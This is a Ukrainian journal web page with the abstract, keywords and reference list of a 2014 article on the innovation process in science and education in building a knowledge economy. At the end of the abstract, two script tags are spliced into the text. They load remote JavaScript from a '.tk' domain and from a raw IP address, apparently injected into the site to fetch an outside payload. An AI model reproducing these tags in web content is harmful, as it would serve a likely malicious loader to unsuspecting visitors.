ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.341.1(045)
Інноваційна діяльність та інтелектуальний капітал

Інноваційний процес у науці та освіті при формуванні економіки знань / Тарасова І. І. // Економіка АПК. - 2014. - № 2 - С. 76

Розглянуто теоретичні основи та практичні результати запровадження інноваційного процесу в науці й освіті при формуванні економіки знань. Зазначено, що інновації в освіті є ключовою умовою якості та конкурентоспроможності системи науки й освіти в нових економічних і соціокультурних умовах, прискорення інтеграції України у міжнародний освітній простір. Охарактеризовано Національну стратегію розвитку освіти в Україні на період до 2021 року, яка забезпечує правове регулювання питань функціонування системи освіти. Визначено, що для здійснення процесу управління системою освіти необхідне забезпечення її ресурсами та умовами функціонування (набір норм, правил, вимог й ін.). Для ефективного формування економіки знань та поліпшень у галузі науки та освіти запропоновано: створення міцної бази людського капіталу аграрного сектору й побудову національних інноваційних систем організації інноваційного процесу України. Рис.: 1. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: наука, освіта, економіка знань, інноваційний процес, інновації, управління системою освіти, національна інноваційна система, людський капітал

Список використаних джерел

 1. Указ Президента України від 25.06.2013 № 344/2013. Про Національну стратегію розвитку освіти в Україні на період до 2021 року [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/344/2013#n10.
 2. Постанова Кабінету Міністрів України від 13.04.2011 № 494. Про затвердження Державної цільової програми впровадження у навчально-виховний процес загальноосвітніх навчальних закладів інформаційно-комунікаційних технологій "Сто відсотків" на період до 2015 року [Електронний ресурс]. – Режим доступу: http://zakon4.rada.gov.ua/laws/show/494-2011-п.
 3. Тарасова І.І. Розвиток інтелектуального забезпечення процесу управління підприємством: моногр. / І.І. Тарасова. – К.: ННЦ «ІАЕ», 2013. – 234 с.
 4. Харченко В.А. Системний підхід до стратегічного управління підприємством / В.А. Харченко // Економічний вісн. Донбасу. – 2013. – № 1 (31). – С. 157-161.
 5. Духота Ю.А. Основы управления циклом наука – производство – реализация продукции новых поколений / Ю.А. Духота. – К.: Урожай, 1992. – 100 с.
 6. Freeman C. Technical Innovation, Diffusion and Long Wave / С. Freeman // The Long Wave Debate, 1987 – 125 р.
 7. Kline S., Rosenberg N. An Overview of Innovation. The Positive Sum Strategy / S. Kline, N. Rosenberg // Landau and Rosenberg (Eds.). Washington, 1986 – 220 р.
 8. Multinational management strategies // Multinational business. – L., 1990. – N 3. – P. 56.
 9. Методология моделирования бизнес-процессов [Электронный ресурс]. – Режим доступа : www.piter-soft.ru/automation/more/glossary/process/metodologiya-modelirovaniya-bixnes-protsessov.
 10. Методология функционального моделирования SADT [Электронный ресурс]. – Режим доступа: www.info-system.ru/disigning/methodology/sadt/theory_sadt.html.
 11. Методология ARIS [Электронный ресурс]. – Режим доступа: www.r-p-c.ru/solution/metodologiya-aris.
 12. Методология IDEF (Integrated DEFinition) моделирования бизнес-процессов [Электронный ресурс]. – Режим доступа: www.r-p-c.ru/solution/metodologiya-idef-integrated-definition-modelirovaniya-biznes-processov.
 13. Вільна енциклопедія [Електронний ресурс]. – Режим доступу : http://ru.wikipedia.org/wiki/Всемирный_банк.
 14. Education for the Knowledge Economy. Офіційний сайт The World Bank [Электронный ресурс]. – Режим доступу: http://web.worldbank.org/WBSITE/EXTERNAL/TOPICS/EXTEDUCATION/0,,contentMDK:20161496~menuPK: 540092 ~pagePK:148956~piPK:216618~theSitePK:282386,00.html.
Читати статтю: 14_02_76-80.pdf